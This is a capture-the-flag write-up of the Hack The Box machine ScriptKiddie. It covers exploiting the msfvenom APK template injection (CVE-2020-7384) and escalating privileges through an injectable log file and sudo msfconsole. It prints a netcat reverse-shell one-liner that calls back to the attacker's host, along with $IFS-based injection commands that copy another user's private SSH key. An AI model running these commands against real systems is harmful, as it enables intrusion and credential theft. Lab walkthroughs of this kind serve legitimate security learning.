# SCRIPTKIDDIE | 10.10.10.226

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.226

### Ports and Services

![nmap scan results](img/nmap.png)

#### 22 - SSH - OpenSSH 8.2p1 Ubuntu

A recent SSH server. Will come back here if I find credentials.

#### 5000 - HTTP - Werkzeug httpd 0.16.1 (Python 3.8.5)

This is a script kiddie's page that let's you scan an IP with nmap, generate payloads with msfvenom, or make a searchsploit query.

![homepage](img/homepage.png)

So far, I have not found a way to append/inject arbitrary commands to the nmap portion, even after opening it in Burp, which allows me to change the action from 'scan' to anything I want. When I do that the output is in json so maybe that is a clue.

For the msfvenom portion, there is an error if I try to generate a linux payload, but the windows and android options result in an actual payload, located at `/static/payloads/122f1def6a8b.<ext>`. The filename is the same every time, so I thought that was interesting until I learned later on that the filename is based on your IP address.

![payload filename](img/filename.png)

The only response to my fuckery comes from the searchsploit box - if I try anything weird I get a snarky warning:

![warning](img/warning.png)

I pfaffed around a lot for a while, using BurpSuite to speed up my attempts at bypassing any filters in place, to no avail. The only thing I have control over is uploading a template for the machine to use with msfvenom, so that is what I ended up focusing on.

## Exploitation - Upload of malicious .apk template to get reverse shell as kid

Finally I realized I should search for some issue involving msfvenom, since that is the one thing crapping out. I searched "msfvenom command injection" on Google and found a relatively new [exploit](https://www.digitalmunition.me/metasploit-framework-6-0-11-command-injection-%E2%89%88-packet-storm/) (CVE-2020-7384) that allows an attacker to create a malicious .apk file as an msfvenom template that can execute code. There was a python version and a metasploit module.

The metasploit module generates the .apk and does not start a listener, but I still wanted to be able to use the python version, to avoid using metasploit altogether.

![original python code](img/exploit-original.png)

The POC payload demonstrates a simple command execution, the output of which is directed to a file on the target. The command is base64 encoded to get around bad character restrictions that one of the java tools (keytool) has. But I don't think it works that well. There are some characters in certain commands that cause errors in the exploit; escaping them with `\` causes the commands to not execute properly.

Finally I just thought to make a simple shell script that runs the reverse shell command:

    echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 6969 >/tmp/f' > koopa

Then I changed the payload to download the script, make it executable and execute it:

![new payload](img/payload.png)

The final step was to run a netcat listener and then upload the payload via the website:

![upload malicious .apk template](img/upload.png)

And wait for the shell to call back home:

![user shell](img/user-shell.png)

#### Flag

![user flag](img/user-flag.png)

After I grabbed the flag, I also grabbed the user's private SSH key for a more stable shell.

## Privilege Escalation - kid > pwn

This user is responsible for the python app that is running on the website ('app.py'), and looking at the code reveals a bit of sneakiness:

![app.py code snippet](img/req-address.png)

It appears that when you use the webpage to make a searchsploit query, the app grabs your IP - if you try anything construed as sus, a timestamp with your IP is put in a file called 'hackers', located in the `/logs` dir of the kid user. When I looked at the file, however, it was empty, even though I tried quite a bit of command injections that elicited warnings.

Also as a side note: the reason the linux msfvenom option is broken on the webpage is because for linux you need to specify either x86 or x64 - just plain old linux is an invalid payload; but the app doesn't allow for that kind of flexibility:

![app.py snippet 2](img/app-py.png)

When the app runs `msfvenom -p linux/meterpreter/reverse_tcp` etc etc it returns an error:

![msfvenom error](img/error.png)

Anyway, I could navigate into the other user's home dir (pwn), and there was a shell script that would read from the 'hackers' file and perform a quick nmap scan on the IPs, then clear out the file.

![scanlosers.sh](img/scanlosers.png)

This can be confirmed by having a listener on one of the top 100 ports and then trying something fishy with the searchsploit on the webpage; in a moment you will receive a connection.

A better way to observe this is to use 'pspy', which watches processes on the machine in realtime. It was instrumental in helping me progress to owning the pwn user.

![pspy output](img/scanned.png)

Seeing this gave me an idea. (It was the wrong idea, but I guess kind of in the ballpark). I checked out [GTFObins](https://gtfobins.github.io/gtfobins/nmap/) and saw I could create a variable (\$TF) as a temp directory, then echo a command into it (`os.execute(reverse shell code)`), then echo `--script=$TF` into the hackers file, and I would have a shell.

Well, no. It took me ages to realize that since the nmap scan is (obviously) running in the context of the pwn user that it would have no idea what the hell $TF was. I spent too long trying to get it to expand the variable into the code I had put there.

After having dinner and a drink, I thought to keep it simple, see if I could get something basic to run as the pwn user. I tried `echo '$(ls)' >> hackers` and the output (via pspy) indicated that the `ls` command did in fact execute:

![command injection](img/ls.png)

At this point I was very excited, after several hours of nothing. But I found I could not have spaces in the commands, so I settled on using '$IFS' - the internal field separator in bash. By default it is a three character string of space, tab, and a newline. I put it in my eventual commands at any place there was a space, with whatever string comes after in double quotes.

With pspy still running I managed to cat out the user pwn's private SSH key, but for simplicity I opted to do two separate commands to copy then chmod the key to the `/home/kid/logs` dir.

    echo '$(cp$IFS"/home/pwn/.ssh/id_rsa"$IFS"/home/kid/logs/id_rsa")' >> hackers

    echo '$(chmod$IFS"644"$IFS"/home/kid/logs/id_rsa")' >> hackers

Then the key is sitting in the `/home/kid/logs` dir, readable. I copied it to my machine and reverted the chmod (to 600), and I was able to log in as pwn via SSH:

![shell as pwn](img/pwn-shell.png)

## Privilege Escalation - pwn > root

`sudo -l` shows user pwn can run msfconsole as root.

![sudo -l for pwn](img/sudo-l-pwn.png)

### Exploit method

type `sudo msfconsole`, then when it loads, just type bash and you are root:

![root shell](img/root-shell.png)

#### Flag

![root flag](img/root-flag.png)

## Conclusion

This was the first Hack the Box machine I tried right at release, and although it was considered easy, it took me many many hours to root it (I had a drink and dinner and another drink and fed the cats during this time too). It was almost disheartening to see that someone rooted it in like 31 minutes, but I didn't give up, and it shows how much I still have to learn. I spent a lot of time trying to inject commands into the text fields on the webpage before thinking I should focus on the one thing I had control over (the template file). Then on the box I got laser-focused on the GTFObins of nmap, thinking the privesc was to get nmap to execute my malicious script.

But once I realized the privesc was actually in the 'scanlosers' script and not nmap it was a short run to pwn, and then a few minutes to root. What a ride.

**Steps taken:**

* Exploit vulnerability in msfvenom to upload a malicious payload template file, get shell as kid
* Use command injection/expansion to view other user's private SSH key, get SSH session as pwn
* Privesc to root via code execution in msfconsole due to sudo permissions
